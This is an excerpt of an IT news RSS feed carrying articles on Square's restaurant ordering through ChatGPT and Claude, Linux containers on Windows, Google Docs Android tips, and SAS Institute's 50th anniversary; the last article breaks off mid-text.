<link>https://tsecurity.de/de/3639047/it-nachrichten/restaurants-can-now-accept-orders-placed-directly-from-chatgpt-and-claude-thanks-to-squares-new-low-fee-no-setup-integration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639047/it-nachrichten/restaurants-can-now-accept-orders-placed-directly-from-chatgpt-and-claude-thanks-to-squares-new-low-fee-no-setup-integration/</guid>
<pubDate>Wed, 01 Jul 2026 18:04:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Square is launching a new ChatGPT app and Claude plugin, enabling consumers to discover restaurants and seamlessly place orders directly within these AI platforms — and allowing restaurants, in turn, to accept orders from users and their AI agents without any technical capabilities. </p><p>Even more helpfully for businesses, Square is processing these AI-driven transactions without charging the traditional marketplace commission fees that have historically squeezed the food and beverage sector.</p><p>However, Square is still charging its <a href="https://squareup.com/us/en/payments/our-fees">typical online ordering fees </a>of 3.3% plus $0.30 or 2.9% plus $0.30 per transaction for merchants subscribed to the Square Plus and Square Premium plans. </p><p>The system pulls straight from the live Square catalog, dynamically mapping items, pricing, complex modifiers, and stock availability so autonomous agents never display out-of-stock inventory.</p><p>For enterprise testing and deployment verification, operators can manually audit their digital footprint by using the "@" symbol to invoke the Order by Cash App plugin directly within ChatGPT or connecting it via the Claude extension directory. </p><p>Depending on the specific AI tool configuration, customers can either finalize checkout completely inside the chat window via Order by Cash App, or they will be seamlessly redirected to the merchant’s standard online ordering landing page with their chosen items and modifiers already fully populated in the basket.</p><h2><b>A more affordable online order system for restaurants</b></h2><p>To understand the significance of Square’s move, you have to look at the math that restaurant owners face in 2026. Third-party delivery and ordering apps have fundamentally altered the economics of the restaurant industry.</p><p>Currently, the major players—DoorDash, Uber Eats, and Grubhub—charge restaurants a hefty premium for visibility and fulfillment. These exorbitant rates exist primarily because delivery aggregators bundle the logistical costs of gig-worker delivery fleets, platform marketing, and search placement into a single revenue-sharing model.</p><p>According to recent pricing structures, <a href="https://merchants.doordash.com/en-us/pricing">DoorDash</a> charges restaurants a 15% commission on its “Basic” delivery tier, which climbs to 25% for “Plus” and 30% for its top-tier “Premier” visibility plan. Even pickup orders carry a 6% marketplace fee. </p><p><a href="https://merchants.ubereats.com/us/en/pricing/">Uber Eats</a> similarly exacts standard delivery marketplace fees ranging from 20% on its “Lite” tier up to 30% for premium placement, with pickup orders costing up to 10% if in-store pricing isn't strictly validated. </p><p><a href="https://get.grubhub.com/grubhub-pricing-and-fees/">Grubhub</a> echoes these rates, taking between 5% and 20% of the total order value depending on the marketing and delivery package chosen.</p><p>On top of these marketplace commissions, platforms still tack on their own payment processing fees—typically around 2.5% to 3.05% plus a fixed cent amount per order. </p><p>For an independent restaurant that might only clear a 3% to 9% net profit on a good day, handing over a 25% or 30% commission on a $40 digital order essentially means preparing food at a loss.</p><p>Square’s new integration specifically targets this pain point. By tapping into Square's ChatGPT and Claude integrations, eligible sellers are opted in automatically with no additional setup, no new APIs to build, and, crucially, zero added marketplace fees.</p><p>Instead of surrendering a 30% cut to a delivery aggregator, a restaurant discovered through an AI agent only pays Square’s standard online transaction processing fee (which typically sits around 2.9% + 30¢ per transaction on a standard plan, with no monthly marketplace commission attached).</p><p>Unlike the delivery aggregators, Square’s fee model does not natively subsidize a driver network. Instead, if an AI-generated order requires delivery, Square utilizes a white-label dispatch network that charges a flat courier fee—often around $7 to $10 depending on distance—rather than taxing a percentage of the total basket size. Restaurants can choose to absorb this flat delivery cost or pass it directly to the customer, completely protecting their food margins.</p><p>The result is an AI-powered discovery channel that functions like direct, first-party ordering.</p><h2><b>How the tech works</b></h2><p>Square’s new integration is currently live for U.S.-based Food &amp; Beverage sellers who have an activated Square Online Ordering profile. </p><p>The system operates entirely in the background. Sellers manage their discoverability and business information—menus, operating hours, stock levels, and pricing—directly through their existing Square Dashboard.</p><p>When a consumer prompts ChatGPT or Claude with a query like, “Find me a specialty coffee shop nearby with a great pour-over and order me a bag of their house roast,” the AI parses the real-time data provided by Square.</p><p>Customers can browse the results, make their selections, and finalize the purchase using Order by Cash App, all without leaving the chat interface.</p><p>The transaction is then routed instantly into the seller’s existing operational flow, popping up on their Square Point of Sale (POS) and Kitchen Display System just like an in-store or direct-website order. </p><p>To help operators track the return on this new channel, the origin of the order is clearly tagged as an AI integration within Square’s backend reporting.</p><p>“Consumer behaviors and preferences are constantly evolving, and business owners can easily find themselves playing an impossible game of catch-up,” said Morgan Kuntze, Global Partnerships Lead at Block, Square’s parent company. “Our investment into agentic commerce aims to offload that responsibility by giving operators time back, helping connect them with customers in their communities, and keeping them at the industry's cutting edge. Modern commerce is moving at a sprint, and we're building Square to help sellers appear everywhere customers are going.”</p><h2><b>Focusing on tech to let restaurants focus on food</b></h2><p>During its pilot phase, Square collaborated with Partners Coffee, a Brooklyn-based specialty coffee brand, to refine how AI-driven discovery translates into the real world. For operators like Partners Coffee, the goal isn't necessarily to become a hyper-digitized storefront, but rather to use digital efficiency to protect the physical experience of the cafe.</p><p>"We don't see coffee as transactional. To us, it's an opportunity to pause and reflect, a chance to unwind, and a catalyst for connection," noted Andrew Costaris, Digital VP at Partners Coffee, in a statement provided by Square to VentureBeat. "The last thing we want is for our technology solutions to work against this mission or complicate the customer experience. With agentic commerce and AI tools working in the background, we're confident knowing that our business is being digitally discovered and is consistently growing in efficiency, while our customers can continue to enjoy a lo-fi, specialty coffee-first environment."</p><h2><b>An AI-driven e-commerce ecosystem</b></h2><p>The integration with ChatGPT and Claude is only the first step in Square’s broader agentic commerce strategy. The stakes are high: industry data cited by the company indicates that more than 42% of consumers now use AI tools to assist with shopping tasks like product discovery and comparison. By 2030, analysts project that agentic shoppers could drive nearly $385 billion in U.S. ecommerce spending.</p><p>Most small and mid-size businesses simply do not have the developer teams or budgets required to build custom integrations for every new chatbot, voice assistant, or AI hardware device that hits the market. Square wants to serve as that universal connective tissue.</p><p>To that end, the company announced it is actively working with Amazon to bring sellers into Alexa+ voice commerce experiences. Furthermore, Square is participating in major regulatory and standards groups—including the AAIF Agentic Commerce Working Group and the W3C Web Payments Working Group—to shape how AI agents and commerce platforms interact at scale.</p><p>Particularly notable is Square’s ongoing partnership with Google to co-develop the Universal Commerce Protocol (UCP) spec for local food ordering. This open standard is designed to allow agents and systems to seamlessly communicate across the entire commerce journey. On Google’s end, UCP enables discovery and checkout across AI Overviews in Search and the Gemini app. As the UCP protocol expands globally, Square plans to roll out these capabilities so that its sellers remain front and center.</p><p>For the more than 4.5 million sellers currently using Square, the promise of agentic commerce is clear: a way to capture the next generation of internet traffic without sacrificing the profit margins required to keep their doors open. If Square can successfully route AI orders directly to local business's POS systems—sidestepping the 30% toll of the delivery aggregators—it could mark a massive shift in how the restaurant industry navigates the modern digital economy.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft just made a huge Linux move that developers and container fans everywhere will love]]></title>
<description><![CDATA[You can now finally run Linux containers in Windows – without third-party tools.]]></description>
<link>https://tsecurity.de/de/3638924/it-nachrichten/microsoft-just-made-a-huge-linux-move-that-developers-and-container-fans-everywhere-will-love/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638924/it-nachrichten/microsoft-just-made-a-huge-linux-move-that-developers-and-container-fans-everywhere-will-love/</guid>
<pubDate>Wed, 01 Jul 2026 17:18:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[You can now finally run Linux containers in Windows – without third-party tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[12 handy hidden Google Docs tricks for Android]]></title>
<description><![CDATA[Few apps are as essential to mobile productivity as the humble word processor. I think I’ve probably spent a solid seven years of my life staring at Google Docs on one device or another at this point, and those minutes only keep ticking up with practically every passing day.



While we can’t do ...]]></description>
<link>https://tsecurity.de/de/3638021/it-nachrichten/12-handy-hidden-google-docs-tricks-for-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638021/it-nachrichten/12-handy-hidden-google-docs-tricks-for-android/</guid>
<pubDate>Wed, 01 Jul 2026 11:47:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Few apps are as essential to mobile productivity as the humble word processor. I think I’ve probably spent a solid seven years of my life staring at Google Docs on one device or another at this point, and those minutes only keep ticking up with practically every passing day.</p>



<p>While we can’t do much about the need to gaze at that word-filled white screen, what we <em>can </em>do is learn how to make every moment spent within Docs count — and in the <a href="https://play.google.com/store/apps/details?id=com.google.android.apps.docs.editors.docs&amp;hl=en_US" target="_blank" rel="noreferrer noopener">Docs Android app</a>, specifically, there are some pretty spectacular tucked-away time-savers just waiting to be discovered.</p>



<p>Make a mental note of these advanced shortcuts and options, and put ’em to good use the next time you find yourself staring at Docs on your own device.</p>



<h2 class="wp-block-heading">Google Docs Android feature #1: Smarter document organization</h2>



<p>We’ll save the best for, erm, first — ’cause the easily overlooked feature we’re kickin’ things off with can save you some serious time and make your mobile editing experience significantly easier.</p>



<p>After all, dealing with a complex document from your phone can be a real hassle. Who wants to waste time scrolling through endless-seeming screens to find the section of info you need to read, edit, or work on at any given moment?</p>



<p>I sure as heckfire don’t — and if you remember to use Docs’ out-of-the-way Outline option, you’ll never have to do it again, either. While viewing or editing any document with any sort of headers in it (be they actual header-formatted text or even just bolded section titles), tap the three-dot menu icon in Docs’ upper-right corner and then select “Document Outline.”</p>



<p>And by golly, wouldya look at that?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/01-google-docs-android-outline.jpg?quality=50&amp;strip=all&amp;w=996" alt="Google Docs Android: Document outline" class="wp-image-4191233" width="996" height="1024" sizes="auto, (max-width: 996px) 100vw, 996px"><figcaption class="wp-element-caption">An automatic document outline is never out of reach in the Docs Android app.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Jumping to any part of the document is now just a single tap away.</p>



<p><strong>[Psst: Love shortcuts? My </strong><a href="https://theintelligence.com/shortcut-ai/" target="_blank" rel="noreferrer noopener"><strong>Android Shortcut Supercourse</strong></a><strong> will teach you tons of time-saving tricks for every single part of your smartphone experience. </strong><a href="https://theintelligence.com/shortcut-ai/"><strong>Sign up now for free</strong></a><strong>!]</strong></p>



<h2 class="wp-block-heading">Google Docs Android feature #2: Instant tab access</h2>



<p>Speaking of organization, in that same section of the in-document three-dot menu resides an easily overlooked option called “Document tabs.”</p>



<p>Tap it, and you can then see, manage, and move among any tabs created within the document for added organization — just like in the Docs desktop interface.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/02-google-docs-android-tabs.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Tabs" class="wp-image-4191231" width="1024" height="1022" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Who knew?! Your Google Docs tabs are now accessible within the Docs Android app as well.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Yes, please — and thank you.</p>



<h2 class="wp-block-heading">Google Docs Android feature #3: Easier Word integration</h2>



<p>When you’re working with clients, colleagues, or even camels who for some reason prefer the Microsoft editing ecosystem, you don’t have to do much to bridge that gap. The Docs Android app can already open and allow you to edit Word files, without any work — and with one simple flip of a switch, you can <em>create</em> new files in the .DOCX format just as easily.</p>



<p>To find the feature, you’ve gotta back out of any actual documents and get onto the main Docs screen — the screen with the search box at the top and all your documents listed out beneath it. Tap the three-line menu icon in the upper-left corner of that screen and head into the Settings section of that main menu. There, you should see the very switch we need:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/03a-google-docs-android-create-word-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Create Word files" class="wp-image-4191225" width="1024" height="537" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Tick one toggle, and you can then create native Word files within the Docs Android app anytime.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Flip that into the on position, then back yourself out to the main Docs screen. The next time you tap the plus icon in that area’s lower-right corner, you should see “New Word file” show up as an option right above the default “New Docs file” command.</p>



<p>And just as a reminder, if you ever want to save an <em>existing</em> Docs file into the .DOCX format, you can do that, too: Tap the three-dot menu icon while editing a document, select “Share &amp; export,” then select “Save As” and choose the “Word (.docx)” option.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/03b-google-docs-android-save-word-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Save as Word" class="wp-image-4191226" width="1024" height="647" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Saving any document as a Word file is also easy, once you know where to look.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You can also save the file as a PDF or other common document format from that same menu.</p>



<h2 class="wp-block-heading">Google Docs Android feature #4: The swift sender</h2>



<p>While we’re thinkin’ about dealing with different document formats, download this into your long-term memory: The next time you need to save or send a document as an actual <em>file</em> — as opposed to an in-app, collaboration-ready Google Docs share — you can save yourself the trouble of downloading and then reuploading the thing and simply send it directly from the Docs Android app.</p>



<p>The trick is to once again tap that three-dot menu icon whilst editing a file and then select that same “Share &amp; export” menu we just went over. But this time, instead of going with the “Save As” option, select “Send a copy.”</p>



<p>You can then pick from the same set of format choices we just finished exploring. And from there, Docs will allow you to choose from any compatible app on your device — everything from <a href="https://www.computerworld.com/article/1707648/best-email-and-texting-apps-for-android.html">Android email and messaging apps</a> to note-storing services like <a href="https://www.computerworld.com/article/1615550/3-fantastic-ways-notion-can-make-you-more-efficient.html">Notion</a> and <a href="https://www.computerworld.com/article/1724688/27-advanced-trello-tips-and-tricks.html">Trello</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/04-google-docs-android-send.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Share" class="wp-image-4191230" width="1024" height="997" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Send any document into any other compatible app on your phone for a simplified sharing setup.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>All it takes is one more tap from there, and your document will be on its way to the appropriate place in the format you requested — just like that.</p>



<h2 class="wp-block-heading">Google Docs Android feature #5: The local file finder</h2>



<p>Ever download a document onto your phone — be it from an email, a Slack channel, a website, or any other such source — and then later find yourself struggling to find it? Well, get this: Google’s got its own simple file finder ready and waiting for you right within the regular Docs app. Who woulda thunk, right?!</p>



<p>But oh, it be there, all righty. It’s that innocuous little folder icon within the search bar on the main Docs screen — something I must’ve seen about a thousand times before I ever thought to actually tap it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/05-google-docs-android-files.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Files" class="wp-image-4191223" width="1024" height="180" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Whoa — a built-in Docs file finder?!</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>When you do, the app will prompt you to find a saved file from either your local phone storage or from your online Drive storage. And once you select either option, you can browse through the associated place to see what’s there or search to find exactly what you’re after — no hopping over to a separate <a href="https://www.computerworld.com/article/1718187/android-file-manager-apps.html">Android file manager</a> required.</p>



<h2 class="wp-block-heading">Google Docs Android feature #6: The Drive detour</h2>



<p>Speaking of Google Drive, if you ever find yourself needing to mosey over to the full Drive interface to dig around more deeply or pull up a file that isn’t text-related, here’s a handy little secret:</p>



<p>You can actually fly from Docs directly to Drive <em>without </em>going through all the usual steps — y’know, heading back to your home screen, finding the Drive icon, and opening it up anew from there.</p>



<p>Just rely on the Docs app’s artfully hidden Drive shortcut to slash steps and zip straight between the two related interfaces. The option is quietly waiting for you within the three-line menu icon on the main Docs screen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/06-google-docs-android-drive.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Google Drive" class="wp-image-4191221" width="1024" height="707" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Docs and Drive — BFFs forever.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>And now you know.</p>



<h2 class="wp-block-heading">Google Docs Android feature #7: The account adjuster</h2>



<p>Keep that overly moist eyeball of yours in that same area of the Docs app interface for a minute, ’cause we’ve got one more sneaky shortcut worth unearthing there.</p>



<p>It’s a shortcut baked into your face — or whatever sort of image you’ve got in place for your Google account profile photo, up in the app’s upper-right corner.</p>



<p>As is the case with most Google-made apps on Android these days, you can swipe up or down on that image to flip through any additional accounts you’ve got connected on your phone. If you only have a single account set up, this obviously won’t apply to you. But if you have, say, a personal Google account and a work address or even a few different situation-specific personal or work identities, it’s a splendid way to move between ’em with next to no effort and just a single swift swipe.</p>



<h2 class="wp-block-heading">Google Docs Android feature #8: The direct document shortcut</h2>



<p>Another shortcut worth burning into your brainspace: If you find yourself working on a specific document or set of documents frequently — whether they’re evolving documents you access all the time or just specific projects on your radar at one particular moment — save yourself the steps of opening the Docs app, finding ’em there, and then tapping their titles to get into ’em and instead give yourself one-tap shortcuts to open the files directly from your home screen.</p>



<p>The option to do that is pretty buried, but it’s well worth digging up. Start by finding the document in question on the main Docs screen. Long-press it, and then look way down on the menu that pops up for the “Add to home screen” command. (Depending on the size of your phone, you might have to scroll down that menu a bit before you’ll see it appear.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/08a-google-docs-android-add-to-home-screen.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add to home screen" class="wp-image-4191219" width="1024" height="1002" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">You’ve usually gotta scroll to find it, but Docs’ “Add to home screen” option is there and ready to save you time.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that bad boy and follow the prompt to place the shortcut wherever you want it — and say “hocus pocus” for good measure, if you’re feelin’ merry — and before you know it, you’ll have an app-like icon sitting right on your home screen. Tapping it will take you directly into the document you selected, without any extra steps required.</p>



<p>You could even get ambitious and create an entire <em>folder </em>on your home screen where you store a variety of high-priority or in-progress documents.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/08b-google-docs-android-home-screen.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen" class="wp-image-4191220" width="1024" height="406" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">What’s up, Docs?</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Three cheers for seconds saved!</p>



<h2 class="wp-block-heading">Google Docs Android feature #9: Quick function shortcuts</h2>



<p>Let’s keep our shortcut mojo goin’ for one more minute, shall we? You can actually follow that same pattern we just went over and and put shortcuts for common Docs commands like creating a new document or searching your existing documents right on your home screen, too. That way, you can perform the associated commands quickly and without any wasted effort opening up the app and hunting around for ’em — and what’s not to love about added efficiency?</p>



<p>These are actually part of Android’s oft-forgotten App Shortcuts system — the thing that came around way back with 2016’s Android 7.1 Nougat release and that’s still vexingly <a href="https://www.computerworld.com/article/1675828/android-app-shortcuts.html">out of sight and out of mind</a> for most of us.</p>



<p>Open up your app drawer, though, and find the Docs icon — or find the Docs icon on your home screen, if it’s there. Press and hold it, and you should see a series of options for direct shortcuts to actions <em>within</em> the app appear.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/09a-google-docs-android-home-screen-shortcuts.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen shortcuts" class="wp-image-4191228" width="1024" height="558" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">All sorts of helpful Docs options are accessible right from your home screen.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You can always get to those by long-pressing the Docs icon, but if you find yourself using the functions often, you can make it even easier by pressing and holding one of ’em within that pop-up menu and then dragging it directly onto your home screen for one-touch access.</p>



<p>You could even build yourself a nifty little Docs command center for super-fast access to all the stuff you use the most:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/09b-google-docs-android-home-screen-command-bar.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Home screen command bar" class="wp-image-4191232" width="1024" height="419" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Docs, Docs, everywhere — so many options, never more than a tap away.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>And while we’ve got easy access on our minds…</p>



<h2 class="wp-block-heading">Google Docs Android feature #10: The offline on switch</h2>



<p>By default, the Docs Android app will make any files you actively work within the app available for offline use for a while — but if you’re getting ready to travel or expecting any other connectivity-challenged moments, you don’t have to rely on its judgment to make sure your stuff is accessible even without internet access.</p>



<p>From the main Docs screen, tap the three-dot icon alongside any document name and then look for the “Make available offline” option within the menu that pops up.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/10-google-docs-android-offline.jpg?quality=50&amp;strip=all&amp;w=990" alt="Google Docs Android: Offline" class="wp-image-4191229" width="990" height="1024" sizes="auto, (max-width: 990px) 100vw, 990px"><figcaption class="wp-element-caption">Pro tip: Turn offline access on <em>before</em> the need actually arises.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that for any document that you expect to need and then rest easy knowing it’ll be there and available for you — no matter your current connection status.</p>



<h2 class="wp-block-heading">Google Docs Android feature #11: Wordless reactions</h2>



<p>Sometimes, a picture really is worth a thousand words. Or at least a couple hundred.</p>



<p>That’s especially true when collaborating on a document and expressing your opinions — which, let’s be honest, often come down to simple reactions like 👍 or maybe 💩.</p>



<p>Docs has allowed emoji reactions as a part of its editing process for a while now, and at some point along the way, the Android app gained the same ability. It’s just weirdly tucked away in a place where few word-minded mammals would ever find it.</p>



<p>So do this: The next time you’re working on a shared doc, try pressing and holding your finger onto any word to highlight it. (You can then use the selector icons that pop up to expand or shift your selection, if needed.)</p>



<p>Now for the tricky part: In the menu that appears alongside your selection — the one that contains “Copy” and other such commands — look for the three-line icon at its far right side.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/11a-google-docs-android-reactions-menu.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add emoji reaction menu" class="wp-image-4191222" width="1024" height="126" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">See that little three-line icon within the text actions pop-up? </figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Tap that — and lookie what we have here: the awkwardly hidden option to add an emoji reaction! 🥳</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/11b-google-docs-android-reactions.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Add emoji reaction" class="wp-image-4191224" width="1024" height="192" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Emojis for everyone — hip, hip, hoorah!</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Hit that sneaky little thing with all your might, then select the most appropriate reaction and move on with a satisfied 😊 in your mind.</p>



<h2 class="wp-block-heading">Google Docs Android feature #12: Your in-doc AI</h2>



<p>Generative AI these days is a bit of a mixed bag, to put it politely. Google’s Gemini and other such services are arguably <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">causing more harm than good</a>, on <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">numerous levels</a>, and also just creating paths for lazy, low-quality and accuracy-challenged work.</p>



<p>But in the right scenario and with the right sort of framing, Gemini-style AI <em>can</em> <a href="https://www.computerworld.com/article/4007736/gemini-android.html">actually be useful</a>. The onus just falls squarely on <em>you</em> to determine how to most effectively use it and avoid falling into the traps of unoriginality or, worse, inaccuracy.</p>



<p>The Docs Android app now offers a direct shortcut to Gemini within its editing interface — via the starburst-shaped icon in the toolbar at the top of the screen — and with some careful considering, it might just end up being a helpful reading or editing tool for you.</p>



<p>A few suggestions that notably <em>don’t </em>involve having AI write lazy, uninspired copy on your behalf:</p>



<ul class="wp-block-list">
<li>You can use the Gemini in Docs system as a quick ‘n’ easy way to get a definition or list of synonyms for any word in front of you.</li>



<li>You can also use it to ask for context or related information — like an integrated research aide. (Just remember that AI doesn’t always get things right, so treat it as more of a starting point than a final quote-ready answer.)</li>



<li>And you can lean on it to perform tasks like summarizing or outlining a long document or helping you reorganize a document into a more logical state.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/12-google-docs-android-gemini.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Docs Android: Gemini" class="wp-image-4191227" width="1024" height="814" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Gemini is now available directly within Docs. Please, use it wisely.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You may still end up spending a ton of time in Docs, but at least now you’ll make the most of every second there and avoid wasting your effort on piddly little tasks that can be made more efficient. And that, as far as I’m concerned, warrants an enthusiastic 🥂 reaction — maybe even followed by a well-earned 🍪.</p>



<p><i>Get six full days of advanced Android knowledge with <a href="https://theintelligence.com/shortcut-ai/" target="_blank" rel="noreferrer noopener"><strong>my free Android Shortcut Supercourse</strong></a>. You’ll learn tons of time-saving tricks for your phone!</i></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAS at 50: The analytics pioneer is cautiously adopting AI]]></title>
<description><![CDATA[It was the middle of the first AI winter when SAS Institute was incorporated on July 1, 1976, and artificial intelligence was not on its product roadmap. Fifty years on, it’s taking a cautious approach to the technology: not going all-in on AI assistants everywhere, like Microsoft, or all out to ...]]></description>
<link>https://tsecurity.de/de/3637813/it-nachrichten/sas-at-50-the-analytics-pioneer-is-cautiously-adopting-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637813/it-nachrichten/sas-at-50-the-analytics-pioneer-is-cautiously-adopting-ai/</guid>
<pubDate>Wed, 01 Jul 2026 10:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It was the middle of the first AI winter when SAS Institute was incorporated on July 1, 1976, and artificial intelligence was not on its product roadmap. Fifty years on, it’s taking a cautious approach to the technology: not going all-in on AI assistants everywhere, like Microsoft, or all out to build AI infrastructure, like Oracle, but looking for areas where AI can reliably add business value.</p>



<p>What started as a four-person company spun out of a research project at North Carolina State University (NCSU)  is now an analytics and AI giant employing about 11,000 people across 39 countries, with more than $3 billion in annual sales.</p>



<p>And over that half-century the company, still privately held by two of its four founders, has been consistently profitable.</p>



<p>That’s not bad for an organization that had modest ambitions. “When we first formed the company, our goal was to make it through the end of the year and be able to not go broke,” said co-founder and still CEO Dr. Jim Goodnight in an interview. “We actually made a little bit of money that year.”</p>



<p>Development of SAS software began at NCSU in the late 1960s, with the aim to analyze complex agricultural data, and in 1971 it was released to customers outside the university. A 1974 NCSU press release touted it as “a major contribution by North Carolina State University to data analysis in the world,” noting that it was one of the major statistical computing systems in use in the US, and was fast becoming a total analysis system.</p>


<div class="extendedBlock-wrapper block-coreImage right"><figure class="wp-block-image alignright size-full is-resized"> width="800" height="800" sizes="auto, (max-width: 800px) 100vw, 800px"&gt;<figcaption class="wp-element-caption"><p>SAS Institute Co-founder and CEO Jim Goodnight</p>
</figcaption></figure><p class="imageCredit">SAS</p></div>



<p>After the inaugural SAS user conference in January 1976, Goodnight, along with colleagues A.J. Barr, John Sall, and Jane Helwig, realized that it was impossible to grow further within the university and decided to incorporate. Barr and Helwig both sold their stakes a few years later, leaving Goodnight and Sall as co-owners, which they remain to this day.</p>



